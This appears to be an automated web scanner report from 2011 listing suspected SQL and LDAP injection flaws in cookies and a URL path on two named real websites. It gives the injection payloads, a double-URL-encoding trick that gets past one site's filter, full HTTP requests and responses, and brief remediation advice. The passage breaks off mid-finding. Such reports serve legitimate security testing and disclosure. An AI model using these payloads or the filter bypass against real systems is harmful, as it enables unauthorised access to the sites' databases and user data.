<meta name="keywords" content="HTC Sprint Touch - HTC Smartphone Wiki, Sprint,Sprint Touch,TouchFlo" /> <meta name="description" content="Official community for HTC products, with tips and tricks for HTC Smartphones, Pocket PC and Android devices." />
<!-- Render IE8 like IE7 --> <meta http-equiv="X-UA-Compatible" content="IE=7" />
The WPC-action cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the WPC-action cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /page/reset+password+for+my+cingular+8125 HTTP/1.1 Host: htcwiki.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action='%20and%201%3d1--%20; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TlPIMWYDxygwU4VtUkf78r; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 1
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:05:04 GMT Server: Apache Set-Cookie: wab=joinButton=42; Domain=htcwiki.wetpaint.com; Expires=Sun, 05-Feb-2012 16:05:04 GMT; Path=/ P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TVp9CNB8VOTvX0KyUR4o0L; Domain=htcwiki.wetpaint.com; Path=/ Set-Cookie: JSESSIONID=7F135B88425F21547100B4AF05FFCEA6; Path=/ Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:05:04 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 42059
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<title>reset password for my cingular 8125 - HTC Smartphone Wiki</title>
<meta name="description" content="Official community for HTC products, with tips and tricks for HTC Smartphones, Pocket PC and Android devices." />
GET /page/reset+password+for+my+cingular+8125 HTTP/1.1 Host: htcwiki.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action='%20and%201%3d2--%20; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TlPIMWYDxygwU4VtUkf78r; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 2
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:05:04 GMT Server: Apache Set-Cookie: wab=joinButton=58; Domain=htcwiki.wetpaint.com; Expires=Sun, 05-Feb-2012 16:05:04 GMT; Path=/ P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TVp9CNB8VOTpTEoGUg3f3M; Domain=htcwiki.wetpaint.com; Path=/ Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:05:04 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 42058
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<title>reset password for my cingular 8125 - HTC Smartphone Wiki</title>
<meta name="description" content="Official community for HTC products, with tips and tricks for HTC Smartphones, Pocket PC and Android devices." />
The wetst cookie appears to be vulnerable to SQL injection attacks. The payloads 18609109'%20or%201%3d1--%20 and 18609109'%20or%201%3d2--%20 were each submitted in the wetst cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /page/reset+password+for+my+cingular+8125 HTTP/1.1 Host: htcwiki.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TlPIMWYDxygwU4VtUkf78r18609109'%20or%201%3d1--%20; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 1
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:05:58 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TDf/d4BLFVKnX33iuXhXee; Domain=htcwiki.wetpaint.com; Path=/ Set-Cookie: JSESSIONID=AE20ED40A75BF632BC7ED48CB3C37C04; Path=/ Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:05:58 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 42059
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<title>reset password for my cingular 8125 - HTC Smartphone Wiki</title>
<meta name="description" content="Official community for HTC products, with tips and tricks for HTC Smartphones, Pocket PC and Android devices." />
GET /page/reset+password+for+my+cingular+8125 HTTP/1.1 Host: htcwiki.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TlPIMWYDxygwU4VtUkf78r18609109'%20or%201%3d2--%20; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 2
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:05:59 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TDf/d4BLFVKmXQVXoFXMNs; Domain=htcwiki.wetpaint.com; Path=/ Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:05:59 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 42058
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<title>reset password for my cingular 8125 - HTC Smartphone Wiki</title>
<meta name="description" content="Official community for HTC products, with tips and tricks for HTC Smartphones, Pocket PC and Android devices." />
The WPC-action cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the WPC-action cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /page/t8282+operating+system HTTP/1.1 Host: htcwiki.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action='%20and%201%3d1--%20; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TlPIMWYDxygwU4VtUkf78r; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 1
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:03:44 GMT Server: Apache Set-Cookie: wab=joinButton=24; Domain=htcwiki.wetpaint.com; Expires=Sun, 05-Feb-2012 16:03:44 GMT; Path=/ P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1RwOfZSdTXsRlTemit3XzC9; Domain=htcwiki.wetpaint.com; Path=/ Set-Cookie: JSESSIONID=E29016370988C60F1E3EEBA8BAB0725D; Path=/ Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:03:44 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 40934
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<title>t8282 operating system - HTC Smartphone Wiki</title>
<meta name="keywords" content="t8282 operating system - HTC Smartphone Wiki, htc t8282 windows mobile" /> <meta name="description" content="Official community for HTC products, with tips and tricks for HTC Smartphones, Pocket PC and Android devices." />
<script type="text/javascript"> //<![CDATA[ var global_inits = {"N ...[SNIP]...
Request 2
GET /page/t8282+operating+system HTTP/1.1 Host: htcwiki.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action='%20and%201%3d2--%20; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TlPIMWYDxygwU4VtUkf78r; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 2
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:03:44 GMT Server: Apache Set-Cookie: wab=joinButton=95; Domain=htcwiki.wetpaint.com; Expires=Sun, 05-Feb-2012 16:03:44 GMT; Path=/ P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1RwOfZSdTXsRr9r2MjsGHTx; Domain=htcwiki.wetpaint.com; Path=/ Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:03:44 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 40934
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<title>t8282 operating system - HTC Smartphone Wiki</title>
<meta name="keywords" content="t8282 operating system - HTC Smartphone Wiki, htc t8282 windows mobile" /> <meta name="description" content="Official community for HTC products, with tips and tricks for HTC Smartphones, Pocket PC and Android devices." />
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /tc%2527/CreateLog.aspx HTTP/1.1 Host: web.survey-poll.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 403 Forbidden Content-Length: 1758 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Sat, 05 Feb 2011 16:29:35 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be displayed</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; ...[SNIP]... <h2>HTTP Error 403.1 - Forbidden: Execute access is denied.<br> ...[SNIP]...
Request 2
GET /tc%2527%2527/CreateLog.aspx HTTP/1.1 Host: web.survey-poll.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 400 Bad Request Connection: close Date: Sat, 05 Feb 2011 16:29:36 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html
<html><body>Bad Request</body></html>
2. LDAP injectionpreviousnext There are 8 instances of this issue:
LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.
Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Issue remediation
If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.
The wetst cookie appears to be vulnerable to LDAP injection attacks.
The payloads *)(sn=* and *)!(sn=* were each submitted in the wetst cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.
Request 1
GET /page/HTC+ALPINE HTTP/1.1 Host: htcwiki.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=*)(sn=*; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 1
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:02:25 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1R/ygmgSHYZPKI20TtYbsJm; Domain=htcwiki.wetpaint.com; Path=/ Set-Cookie: JSESSIONID=E58B38A7E034A4FD9D63E96B232CD545; Path=/ Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:02:25 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 43249
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<title>HTC Alpine - HTC Smartphone Wiki</title>
<meta name="keywords" content="HTC Alpine - HTC Smartphone Wiki, Alpine,phone specs" /> <meta name="description" content="Official community for HTC products, with tips and tricks for HTC Smartphones, Pocket PC and Android devices." />
<!-- Render IE8 like IE7 --> <meta http-equiv="X-UA-Compatible" content="IE=7" />
GET /page/HTC+ALPINE HTTP/1.1 Host: htcwiki.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=*)!(sn=*; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 2
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:02:26 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1R/ygmgSHYZPBTPa46o3vcX; Domain=htcwiki.wetpaint.com; Path=/ Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:02:26 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 43248
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<title>HTC Alpine - HTC Smartphone Wiki</title>
<meta name="keywords" content="HTC Alpine - HTC Smartphone Wiki, Alpine,phone specs" /> <meta name="description" content="Official community for HTC products, with tips and tricks for HTC Smartphones, Pocket PC and Android devices." />
<!-- Render IE8 like IE7 --> <meta http-equiv="X-UA-Compatible" content="IE=7" />
The wetst cookie appears to be vulnerable to LDAP injection attacks.
The payloads 35377aaaf664e1c3)(sn=* and 35377aaaf664e1c3)!(sn=* were each submitted in the wetst cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.
Request 1
GET /page/HTC+BLUE+ANGEL HTTP/1.1 Host: htcwiki.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=35377aaaf664e1c3)(sn=*; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 1
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:04:43 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1Q+6Wn+9o/R/6napQKp+AHS; Domain=htcwiki.wetpaint.com; Path=/ Set-Cookie: JSESSIONID=62AF78062B691081ABF216F8E028B2C6; Path=/ Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:04:43 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 57728
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<title>HTC Blue Angel - HTC Smartphone Wiki</title>
<meta name="keywords" content="HTC Blue Angel - HTC Smartphone Wiki, Blue Angel,Smartphone" /> <meta name="description" content="Official community for HTC products, with tips and tricks for HTC Smartphones, Pocket PC and Android devices." />
<!-- Render IE8 like IE7 --> <meta http-equiv="X-UA-Compatible" content="IE=7" />
GET /page/HTC+BLUE+ANGEL HTTP/1.1 Host: htcwiki.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=35377aaaf664e1c3)!(sn=*; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 2
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:04:44 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1Q+6Wn+9o/R/6boEIAXRvZr; Domain=htcwiki.wetpaint.com; Path=/ Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:04:44 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 57727
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<title>HTC Blue Angel - HTC Smartphone Wiki</title>
<meta name="keywords" content="HTC Blue Angel - HTC Smartphone Wiki, Blue Angel,Smartphone" /> <meta name="description" content="Official community for HTC products, with tips and tricks for HTC Smartphones, Pocket PC and Android devices." />
<!-- Render IE8 like IE7 --> <meta http-equiv="X-UA-Compatible" content="IE=7" />
The wetst cookie appears to be vulnerable to LDAP injection attacks.
The payloads *)(sn=* and *)!(sn=* were each submitted in the wetst cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.
Request 1
GET /page/HTC+Smartphone+Wiki/history HTTP/1.1 Host: htcwiki.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=*)(sn=*; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 1
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:02:15 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1RgUcALK9RCBCnNbZM/Rypn; Domain=htcwiki.wetpaint.com; Path=/ Set-Cookie: JSESSIONID=66B5CBC9BBBD8C7C01B9EDA22E06D15E; Path=/ Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:02:15 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 57599
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<title>HTC Smartphone Wiki - History Page - HTC Smartphone Wiki</title>
<meta name="keywords" content="HTC Smartphone Wiki - History Page - HTC Smartphone Wiki, Android,Device home page,Home,Home page,HTC,Pocket PC,Smartphone" /> <meta name="description" content="HTC Smartphone Wiki - HTC Smartphone Wiki - History Page" />
GET /page/HTC+Smartphone+Wiki/history HTTP/1.1 Host: htcwiki.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=*)!(sn=*; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 2
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:02:15 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1RgUcALK9RCBNDxtr28xs5l; Domain=htcwiki.wetpaint.com; Path=/ Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:02:15 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 57599
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<title>HTC Smartphone Wiki - History Page - HTC Smartphone Wiki</title>
<meta name="keywords" content="HTC Smartphone Wiki - History Page - HTC Smartphone Wiki, Android,Device home page,Home,Home page,HTC,Pocket PC,Smartphone" /> <meta name="description" content="HTC Smartphone Wiki - HTC Smartphone Wiki - History Page" />
The wetst cookie appears to be vulnerable to LDAP injection attacks.
The payloads *)(sn=* and *)!(sn=* were each submitted in the wetst cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.
Request 1
